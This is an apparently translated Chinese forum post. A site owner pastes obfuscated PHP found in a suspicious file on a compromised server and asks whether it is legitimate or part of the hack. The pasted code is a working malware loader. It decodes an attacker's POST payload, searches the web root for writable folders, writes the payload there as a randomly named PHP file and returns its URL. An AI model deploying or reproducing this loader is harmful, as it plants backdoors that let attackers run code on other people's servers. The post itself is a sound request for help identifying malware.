此代码在名为gmkcpqob.php的文件中
下面是代码,减去php标签:
$oypvn = "mhrnxofglzdzgfib";$tegfzuin = "";foreach ($_POST as $geommmgv => $wqslp){if (strlen($geommmgv) == 16 and substr_count($wqslp, "%") > 10){xhslwtou($geommmgv, $wqslp);}}function xhslwtou($geommmgv, $btwnqryh){global $tegfzuin;$tegfzuin = $geommmgv;$btwnqryh = str_split(rawurldecode(str_rot13($btwnqryh)));function syeghivd($yyxmmntjc, $geommmgv){global $oypvn, $tegfzuin;return $yyxmmntjc ^ $oypvn[$geommmgv % strlen($oypvn)] ^ $tegfzuin[$geommmgv % strlen($tegfzuin)];}$btwnqryh = implode("", array_map("syeghivd", array_values($btwnqryh), array_keys($btwnqryh)));$btwnqryh = @unserialize($btwnqryh);if (@is_array($btwnqryh)){$geommmgv = array_keys($btwnqryh);$btwnqryh = $btwnqryh[$geommmgv[0]];if ($btwnqryh === $geommmgv[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function wopxn($lomiyocir) {static $isgwkoi = array();$cdqpwpimg = glob($lomiyocir . '/*', GLOB_ONLYDIR);if (count($cdqpwpimg) > 0) {foreach ($cdqpwpimg as $lomiyoc){if (@is_writable($lomiyoc)){$isgwkoi[] = $lomiyoc;}}}foreach ($cdqpwpimg as $lomiyocir) wopxn($lomiyocir);return $isgwkoi;}$nuzkzv = $_SERVER["DOCUMENT_ROOT"];$cdqpwpimg = wopxn($nuzkzv);$geommmgv = array_rand($cdqpwpimg);$yttwcfcb = $cdqpwpimg[$geommmgv] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($yttwcfcb, $btwnqryh);echo "http://" . $_SERVER["HTTP_HOST"] . substr($yttwcfcb, strlen($nuzkzv));exit();}}}
您知道这是一个合法的字体文件吗? 还是黑客的一部分?
其他被黑客入侵的文件都是不同的,因此,如果这是其中一部分,则与所有其他文件有很大不同。 该黑客似乎是恶意软件。他们正在调用一个.ico文件,该文件我已解码,但仍然非常复杂。
如果您知道这是否合法,我们将不胜感激。
谢谢, -理查德
我已经搜索过谷歌,但也许他们输入了唯一的名称,不确定。